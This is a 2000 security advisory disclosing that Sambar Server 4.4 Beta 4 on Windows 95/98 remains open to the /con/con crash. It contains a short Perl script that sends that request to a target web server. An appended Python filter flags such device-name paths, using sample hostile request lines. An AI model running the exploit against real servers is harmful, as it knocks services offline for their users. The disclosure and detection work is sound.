daemon-root's security research

Advisory Name: dae_sambar44b4
Release Date:  10 November 2000
Application:   Sambar Server 4.4 Beta 4 Windows (http://www.sambar.com)
Platform:      Windows 95, 98
Severity:      The server is still vulnerable to the infamous /con/con exploit
Author:        daemon-root (daemon_r00t@secureroot.com)
Web:           http://www.daemon-root.da.ru

Overview:

Sambar Server is a free, multithreaded HTTP server for Windows 95/NT. Its
features include HTTP proxy, search engine, log analysis, security,
server-side scripting, and DLLs. This release adds unbuffered CGI support,
a native FTP proxy, the sacrypt encryption utility, and significantly faster
full-text indexing, yet it is still vulnerable to the infamous /con/con
exploit, as were previous versions of Sambar Server.

Proof of concept code:

[dae_sambar44.pl]
# Sambar Server 4.4 Beta 4 Windows /con/con Exploit
#
# Bad Perl Code by: daemon-root
# Website: http://www.daemon-root.da.ru
#
# This is for EDUCATION purposes ONLY!

use IO::Socket;

print "Sambar Server 4.4 Beta 4 Windows /con/con Exploit\n";
print "=================================================\n";

# The target host is the only command-line argument
if (not $ARGV[0]) {
    print "Usage: $0 [host]\n\n";
    exit(0);
}

# Open a TCP connection to port 80 on the target host
sub connecthost {
    $host = IO::Socket::INET->new (
        Proto    => "tcp",
        PeerAddr => $ARGV[0],
        PeerPort => "80",) or die "Can't open connection to $ARGV[0] because $!\n";
    $host->autoflush(1);
}

# Request path that names the CON device twice
$exploit .= "/con/con";

print "\nOpen connection...\n";
&connecthost;
print "Sending characters...\n";
print $host "GET $exploit HTTP/1.0\n";
print "close connection...\n";
close $host;
[END OF dae_sambar44.pl]

Vendor status:

The vendor was informed on 10 November 2000.

______________________________________________________________
daemon-root's security research - http://www.daemon-root.da.ru
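
A server-side check for the request class this advisory describes, as an added example that is not part of the original advisory or of Sambar Server: it refuses any request whose path contains a segment that resolves to a reserved DOS device name, which generalizes beyond the literal /con/con path. The device-name list (standard Windows reserved names, not taken from the advisory), the function names and the sample request lines are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names on Windows (assumption: standard list, not from the advisory)
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
DOS_DEVICES |= {f"COM{i}" for i in range(1, 10)} | {f"LPT{i}" for i in range(1, 10)}


def device_segments(raw_target):
    """Return the path segments of a request target that name a DOS device."""
    path = raw_target.split("?", 1)[0]          # the query string is not a file path
    for _ in range(3):                          # undo nested percent-encoding (%2563on)
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    hits = []
    for seg in re.split(r"[/\\]+", path):       # both separators reach the file system
        # Trailing dots/spaces, an extension or a trailing colon still name the device
        base = seg.rstrip(" .").split(".", 1)[0].split(":", 1)[0].strip().upper()
        if base in DOS_DEVICES:
            hits.append(seg)
    return hits


def flag_requests(request_lines):
    """Return (request line, offending segments) for every request to refuse."""
    flagged = []
    for line in request_lines:
        parts = line.split()
        if len(parts) >= 2:                     # METHOD TARGET [VERSION]
            hits = device_segments(parts[1])
            if hits:
                flagged.append((line, hits))
    return flagged


# Constructed request lines for illustration
SAMPLE = [
    "GET /con/con HTTP/1.0",
    "GET /index.html HTTP/1.0",
    "GET /docs/console.html HTTP/1.0",
    "GET /%63on/%63on HTTP/1.0",
    "GET /images/LPT1.gif HTTP/1.0",
    "GET /search?q=con HTTP/1.0",
]

if __name__ == "__main__":
    for line, hits in flag_requests(SAMPLE):
        print(f"REFUSE {line!r}: device segments {hits}")
```

The same function can run over the request column of an access log to find past attempts, or sit in front of path-to-file mapping so the request never reaches the file system.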